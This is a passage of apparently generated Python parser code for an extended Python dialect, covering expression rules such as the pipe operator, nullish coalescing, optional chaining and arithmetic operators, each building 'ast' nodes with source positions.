return ast . IfExp ( body = a , test = b , orelse = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(b := self.disjunction())
and
(literal := self.expect('?'))
and
self.negative_lookahead(self.expect, '?')
and
(a := self.disjunction())
and
(literal_1 := self.expect(':'))
and
(c := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . IfExp ( body = a , test = b , orelse = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(disjunction := self.disjunction())
):
return disjunction
self._reset(mark)
if (
(lambdef := self.lambdef())
):
return lambdef
self._reset(mark)
return None
@memoize
def yield_expr(self) -> Optional[Any]:
# yield_expr: 'yield' 'from' expression | 'yield' star_expressions?
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('yield'))
and
(literal_1 := self.expect('from'))
and
(a := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . YieldFrom ( value = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('yield'))
and
(a := self.star_expressions(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Yield ( value = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def star_expressions(self) -> Optional[Any]:
# star_expressions: star_expression ((',' star_expression))+ ','? | star_expression ',' | star_expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.star_expression())
and
(b := self._loop1_82())
and
(opt := self.expect(','),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = [a] + b , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.star_expression())
and
(literal := self.expect(','))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = [a] , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(star_expression := self.star_expression())
):
return star_expression
self._reset(mark)
return None
@memoize
def star_expression(self) -> Optional[Any]:
# star_expression: '*' bitwise_or | expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('*'))
and
(a := self.bitwise_or())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Starred ( value = a , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def star_named_expressions(self) -> Optional[Any]:
# star_named_expressions: ','.star_named_expression+ ','?
mark = self._mark()
if (
(a := self._gather_83())
and
(opt := self.expect(','),)
):
return a
self._reset(mark)
return None
@memoize
def star_named_expression(self) -> Optional[Any]:
# star_named_expression: '*' bitwise_or | named_expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('*'))
and
(a := self.bitwise_or())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Starred ( value = a , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(named_expression := self.named_expression())
):
return named_expression
self._reset(mark)
return None
@memoize
def assignment_expression(self) -> Optional[Any]:
# assignment_expression: NAME ':=' ~ expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
cut = False
if (
(a := self.name())
and
(literal := self.expect(':='))
and
(cut := True)
and
(b := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 8 ) , "The ':=' operator is" , ast . NamedExpr ( target = ast . Name ( id = a . string , ctx = Store , lineno = a . start [0] , col_offset = a . start [1] , end_lineno = a . end [0] , end_col_offset = a . end [1] ) , value = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , ) )
self._reset(mark)
if cut: return None
return None
@memoize
def named_expression(self) -> Optional[Any]:
# named_expression: assignment_expression | invalid_named_expression | expression !':='
mark = self._mark()
if (
(assignment_expression := self.assignment_expression())
):
return assignment_expression
self._reset(mark)
if (
(invalid_named_expression := self.invalid_named_expression())
):
return None # pragma: no cover
self._reset(mark)
if (
(a := self.expression())
and
self.negative_lookahead(self.expect, ':=')
):
return a
self._reset(mark)
return None
@memoize
def disjunction(self) -> Optional[Any]:
# disjunction: conjunction (('or' conjunction))+ | conjunction (('??' conjunction))+ | conjunction
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.conjunction())
and
(b := self._loop1_85())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BoolOp ( op = ast . Or ( ) , values = [a] + b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.conjunction())
and
(b := self._loop1_86())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 8 ) , "The '??' operator is" , self . make_nullish_coalescing ( [a] + b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
self._reset(mark)
if (
(conjunction := self.conjunction())
):
return conjunction
self._reset(mark)
return None
@memoize
def conjunction(self) -> Optional[Any]:
# conjunction: inversion (('and' inversion))+ | inversion
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.inversion())
and
(b := self._loop1_87())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BoolOp ( op = ast . And ( ) , values = [a] + b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(inversion := self.inversion())
):
return inversion
self._reset(mark)
return None
@memoize
def inversion(self) -> Optional[Any]:
# inversion: 'not' inversion | comparison
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('not'))
and
(a := self.inversion())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . UnaryOp ( op = ast . Not ( ) , operand = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(comparison := self.comparison())
):
return comparison
self._reset(mark)
return None
@memoize
def comparison(self) -> Optional[Any]:
# comparison: pipe_expression compare_op_pipe_expression_pair+ | pipe_expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.pipe_expression())
and
(b := self._loop1_88())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Compare ( left = a , ops = self . get_comparison_ops ( b ) , comparators = self . get_comparators ( b ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(pipe_expression := self.pipe_expression())
):
return pipe_expression
self._reset(mark)
return None
@memoize
def compare_op_pipe_expression_pair(self) -> Optional[Any]:
# compare_op_pipe_expression_pair: eq_pipe_expression | noteq_pipe_expression | lte_pipe_expression | lt_pipe_expression | gte_pipe_expression | gt_pipe_expression | notin_pipe_expression | in_pipe_expression | isnot_pipe_expression | is_pipe_expression
mark = self._mark()
if (
(eq_pipe_expression := self.eq_pipe_expression())
):
return eq_pipe_expression
self._reset(mark)
if (
(noteq_pipe_expression := self.noteq_pipe_expression())
):
return noteq_pipe_expression
self._reset(mark)
if (
(lte_pipe_expression := self.lte_pipe_expression())
):
return lte_pipe_expression
self._reset(mark)
if (
(lt_pipe_expression := self.lt_pipe_expression())
):
return lt_pipe_expression
self._reset(mark)
if (
(gte_pipe_expression := self.gte_pipe_expression())
):
return gte_pipe_expression
self._reset(mark)
if (
(gt_pipe_expression := self.gt_pipe_expression())
):
return gt_pipe_expression
self._reset(mark)
if (
(notin_pipe_expression := self.notin_pipe_expression())
):
return notin_pipe_expression
self._reset(mark)
if (
(in_pipe_expression := self.in_pipe_expression())
):
return in_pipe_expression
self._reset(mark)
if (
(isnot_pipe_expression := self.isnot_pipe_expression())
):
return isnot_pipe_expression
self._reset(mark)
if (
(is_pipe_expression := self.is_pipe_expression())
):
return is_pipe_expression
self._reset(mark)
return None
@memoize
def eq_pipe_expression(self) -> Optional[Any]:
# eq_pipe_expression: '==' pipe_expression
mark = self._mark()
if (
(literal := self.expect('=='))
and
(a := self.pipe_expression())
):
return ( ast . Eq ( ) , a )
self._reset(mark)
return None
@memoize
def noteq_pipe_expression(self) -> Optional[tuple]:
# noteq_pipe_expression: '!=' pipe_expression
mark = self._mark()
if (
(literal := self.expect('!='))
and
(a := self.pipe_expression())
):
return ( ast . NotEq ( ) , a )
self._reset(mark)
return None
@memoize
def lte_pipe_expression(self) -> Optional[Any]:
# lte_pipe_expression: '<=' pipe_expression
mark = self._mark()
if (
(literal := self.expect('<='))
and
(a := self.pipe_expression())
):
return ( ast . LtE ( ) , a )
self._reset(mark)
return None
@memoize
def lt_pipe_expression(self) -> Optional[Any]:
# lt_pipe_expression: '<' pipe_expression
mark = self._mark()
if (
(literal := self.expect('<'))
and
(a := self.pipe_expression())
):
return ( ast . Lt ( ) , a )
self._reset(mark)
return None
@memoize
def gte_pipe_expression(self) -> Optional[Any]:
# gte_pipe_expression: '>=' pipe_expression
mark = self._mark()
if (
(literal := self.expect('>='))
and
(a := self.pipe_expression())
):
return ( ast . GtE ( ) , a )
self._reset(mark)
return None
@memoize
def gt_pipe_expression(self) -> Optional[Any]:
# gt_pipe_expression: '>' pipe_expression
mark = self._mark()
if (
(literal := self.expect('>'))
and
(a := self.pipe_expression())
):
return ( ast . Gt ( ) , a )
self._reset(mark)
return None
@memoize
def notin_pipe_expression(self) -> Optional[Any]:
# notin_pipe_expression: 'not' 'in' pipe_expression
mark = self._mark()
if (
(literal := self.expect('not'))
and
(literal_1 := self.expect('in'))
and
(a := self.pipe_expression())
):
return ( ast . NotIn ( ) , a )
self._reset(mark)
return None
@memoize
def in_pipe_expression(self) -> Optional[Any]:
# in_pipe_expression: 'in' pipe_expression
mark = self._mark()
if (
(literal := self.expect('in'))
and
(a := self.pipe_expression())
):
return ( ast . In ( ) , a )
self._reset(mark)
return None
@memoize
def isnot_pipe_expression(self) -> Optional[Any]:
# isnot_pipe_expression: 'is' 'not' pipe_expression
mark = self._mark()
if (
(literal := self.expect('is'))
and
(literal_1 := self.expect('not'))
and
(a := self.pipe_expression())
):
return ( ast . IsNot ( ) , a )
self._reset(mark)
return None
@memoize
def is_pipe_expression(self) -> Optional[Any]:
# is_pipe_expression: 'is' pipe_expression
mark = self._mark()
if (
(literal := self.expect('is'))
and
(a := self.pipe_expression())
):
return ( ast . Is ( ) , a )
self._reset(mark)
return None
@memoize_left_rec
def pipe_expression(self) -> Optional[Any]:
# pipe_expression: pipe_expression '|>' bitwise_or | bitwise_or
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.pipe_expression())
and
(literal := self.expect('|>'))
and
(b := self.bitwise_or())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Call ( func = b , args = [a] , keywords = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(bitwise_or := self.bitwise_or())
):
return bitwise_or
self._reset(mark)
return None
@memoize_left_rec
def bitwise_or(self) -> Optional[Any]:
# bitwise_or: bitwise_or '|' bitwise_xor | bitwise_xor
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.bitwise_or())
and
(literal := self.expect('|'))
and
(b := self.bitwise_xor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . BitOr ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(bitwise_xor := self.bitwise_xor())
):
return bitwise_xor
self._reset(mark)
return None
@memoize_left_rec
def bitwise_xor(self) -> Optional[Any]:
# bitwise_xor: bitwise_xor '^' bitwise_and | bitwise_and
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.bitwise_xor())
and
(literal := self.expect('^'))
and
(b := self.bitwise_and())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . BitXor ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(bitwise_and := self.bitwise_and())
):
return bitwise_and
self._reset(mark)
return None
@memoize_left_rec
def bitwise_and(self) -> Optional[Any]:
# bitwise_and: bitwise_and '&' shift_expr | shift_expr
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.bitwise_and())
and
(literal := self.expect('&'))
and
(b := self.shift_expr())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . BitAnd ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(shift_expr := self.shift_expr())
):
return shift_expr
self._reset(mark)
return None
@memoize_left_rec
def shift_expr(self) -> Optional[Any]:
# shift_expr: shift_expr '<<' sum | shift_expr '>>' sum | sum
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.shift_expr())
and
(literal := self.expect('<<'))
and
(b := self.sum())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . LShift ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.shift_expr())
and
(literal := self.expect('>>'))
and
(b := self.sum())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . RShift ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(sum := self.sum())
):
return sum
self._reset(mark)
return None
@memoize_left_rec
def sum(self) -> Optional[Any]:
# sum: sum '+' term | sum '-' term | term
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.sum())
and
(literal := self.expect('+'))
and
(b := self.term())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . Add ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.sum())
and
(literal := self.expect('-'))
and
(b := self.term())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . Sub ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(term := self.term())
):
return term
self._reset(mark)
return None
@memoize_left_rec
def term(self) -> Optional[Any]:
# term: term '*' factor | term '/' factor | term '//' factor | term '%' factor | term '@' factor | factor
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.term())
and
(literal := self.expect('*'))
and
(b := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . Mult ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.term())
and
(literal := self.expect('/'))
and
(b := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . Div ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.term())
and
(literal := self.expect('//'))
and
(b := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . FloorDiv ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.term())
and
(literal := self.expect('%'))
and
(b := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . Mod ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.term())
and
(literal := self.expect('@'))
and
(b := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 5 ) , "The '@' operator is" , ast . BinOp ( left = a , op = ast . MatMult ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
self._reset(mark)
if (
(factor := self.factor())
):
return factor
self._reset(mark)
return None
    @memoize
    def factor(self) -> Optional[Any]:
        """Parse a ``factor``: a unary ``+``/``-``/``~`` applied to a factor, or a power.

        Returns an ``ast.UnaryOp`` (or the ``power`` result) on success; on
        failure resets the tokenizer to ``mark`` and returns None.
        """
        # factor: '+' factor | '-' factor | '~' factor | power
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('+'))
            and
            (a := self.factor())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . UnaryOp ( op = ast . UAdd ( ) , operand = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('-'))
            and
            (a := self.factor())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . UnaryOp ( op = ast . USub ( ) , operand = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('~'))
            and
            (a := self.factor())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . UnaryOp ( op = ast . Invert ( ) , operand = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (power := self.power())
        ):
            return power
        self._reset(mark)
        return None
    @memoize
    def power(self) -> Optional[Any]:
        """Parse a ``power``: ``await_primary '**' factor`` or a bare ``await_primary``.

        ``**`` is right-associative because the right operand recurses into
        ``factor``. Returns an AST node or None (after resetting to ``mark``).
        """
        # power: await_primary '**' factor | await_primary
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.await_primary())
            and
            (literal := self.expect('**'))
            and
            (b := self.factor())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . BinOp ( left = a , op = ast . Pow ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (await_primary := self.await_primary())
        ):
            return await_primary
        self._reset(mark)
        return None
    @memoize
    def await_primary(self) -> Optional[Any]:
        """Parse an ``await_primary``: ``'await' primary`` or a plain ``primary``.

        Await expressions are gated to Python >= 3.5 via ``check_version``.
        Returns an AST node or None (after resetting to ``mark``).
        """
        # await_primary: 'await' primary | primary
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('await'))
            and
            (a := self.primary())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . check_version ( ( 3 , 5 ) , "Await expressions are" , ast . Await ( a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
        self._reset(mark)
        if (
            (primary := self.primary())
        ):
            return primary
        self._reset(mark)
        return None
    @memoize_left_rec
    def primary(self) -> Optional[Any]:
        """Parse a ``primary``: attribute access, calls, subscripts, optional
        chaining (``?.`` / ``?[``), partial application, or a bare ``atom``.

        The rule is left-recursive, so it uses ``memoize_left_rec`` to grow the
        match iteratively. Alternatives using ``(x := f(),)`` wrap an optional
        sub-parse in a one-element tuple so the ``and`` chain cannot fail on it.
        Returns an AST node or None (after resetting to ``mark``).
        """
        # primary: primary '.' NAME | primary '?' '.' NAME '(' arguments? ')' | primary '?' '.' NAME | primary genexp | primary '(' arguments? ')' | primary '(' partial_arguments ')' | primary '[' slices ']' | primary '?' '[' slice ']' | atom
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.primary())
            and
            (literal := self.expect('.'))
            and
            (b := self.name())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Attribute ( value = a , attr = b . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.primary())
            and
            (literal := self.expect('?'))
            and
            (literal_1 := self.expect('.'))
            and
            (b := self.name())
            and
            (literal_2 := self.expect('('))
            and
            (c := self.arguments(),)
            and
            (literal_3 := self.expect(')'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            # Optional-chained call: a?.b(...) — c is (args, keywords) or None.
            return self . make_optional_chaining ( a , ast . Call ( func = ast . Attribute ( value = a , attr = b . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) , args = c [0] if c else [] , keywords = c [1] if c else [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.primary())
            and
            (literal := self.expect('?'))
            and
            (literal_1 := self.expect('.'))
            and
            (b := self.name())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            # Optional-chained attribute access: a?.b
            return self . make_optional_chaining ( a , ast . Attribute ( value = a , attr = b . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.primary())
            and
            (b := self.genexp())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            # Call with a bare generator expression as the sole argument: f(x for x in xs)
            return ast . Call ( func = a , args = [b] , keywords = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.primary())
            and
            (literal := self.expect('('))
            and
            (b := self.arguments(),)
            and
            (literal_1 := self.expect(')'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Call ( func = a , args = b [0] if b else [] , keywords = b [1] if b else [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
        self._reset(mark)
        if (
            (a := self.primary())
            and
            (literal := self.expect('('))
            and
            (b := self.partial_arguments())
            and
            (literal_1 := self.expect(')'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . make_partial_function ( a , b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.primary())
            and
            (literal := self.expect('['))
            and
            (b := self.slices())
            and
            (literal_1 := self.expect(']'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Subscript ( value = a , slice = b , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.primary())
            and
            (literal := self.expect('?'))
            and
            (literal_1 := self.expect('['))
            and
            (b := self.slice())
            and
            (literal_2 := self.expect(']'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            # Optional-chained subscript: a?[b]
            return self . make_optional_chaining ( a , ast . Subscript ( value = a , slice = b , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (atom := self.atom())
        ):
            return atom
        self._reset(mark)
        return None
    @memoize
    def slices(self) -> Optional[Any]:
        """Parse subscript contents: a single slice, or a comma-separated tuple.

        On 3.9+ a multi-item subscript is a plain ``ast.Tuple``; on older
        targets it is wrapped in the deprecated ``ExtSlice``/``Index`` nodes.
        Returns an AST node or None (after resetting to ``mark``).
        """
        # slices: slice !',' | ','.slice+ ','?
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.slice())
            and
            self.negative_lookahead(self.expect, ',')
        ):
            return a
        self._reset(mark)
        if (
            (a := self._gather_89())
            and
            (opt := self.expect(','),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Tuple ( elts = a , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ( ast . ExtSlice ( dims = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if any ( isinstance ( e , ast . Slice ) for e in a ) else ast . Index ( value = ast . Tuple ( elts = [e . value for e in a] , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
        self._reset(mark)
        return None
    @memoize
    def slice(self) -> Optional[Any]:
        """Parse one slice item: ``lower? ':' upper? (':' step?)?`` or a named expression.

        Pre-3.9 targets wrap a plain expression in the legacy ``ast.Index``.
        Returns an AST node or None (after resetting to ``mark``).
        """
        # slice: expression? ':' expression? [':' expression?] | named_expression
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.expression(),)
            and
            (literal := self.expect(':'))
            and
            (b := self.expression(),)
            and
            (c := self._tmp_91(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Slice ( lower = a , upper = b , step = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self.named_expression())
        ):
            return a if sys . version_info >= ( 3 , 9 ) or isinstance ( a , ast . Slice ) else ast . Index ( value = a , lineno = a . lineno , col_offset = a . col_offset , end_lineno = a . end_lineno , end_col_offset = a . end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def atom(self) -> Optional[Any]:
        """Parse an ``atom``: name, keyword constant, string, number, bracketed
        display (tuple/group/genexp, list/listcomp, dict/set/comps), or ``...``.

        Constants pass ``kind=None`` explicitly when targeting < 3.9.
        Returns an AST node or None (after resetting to ``mark``).
        """
        # atom: NAME | 'True' | 'False' | 'None' | &STRING strings | NUMBER | &'(' (tuple | group | genexp) | &'[' (list | listcomp) | &'{' (dict | set | dictcomp | setcomp) | '...'
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.name())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Name ( id = a . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('True'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Constant ( value = True , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . Constant ( value = True , kind = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('False'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
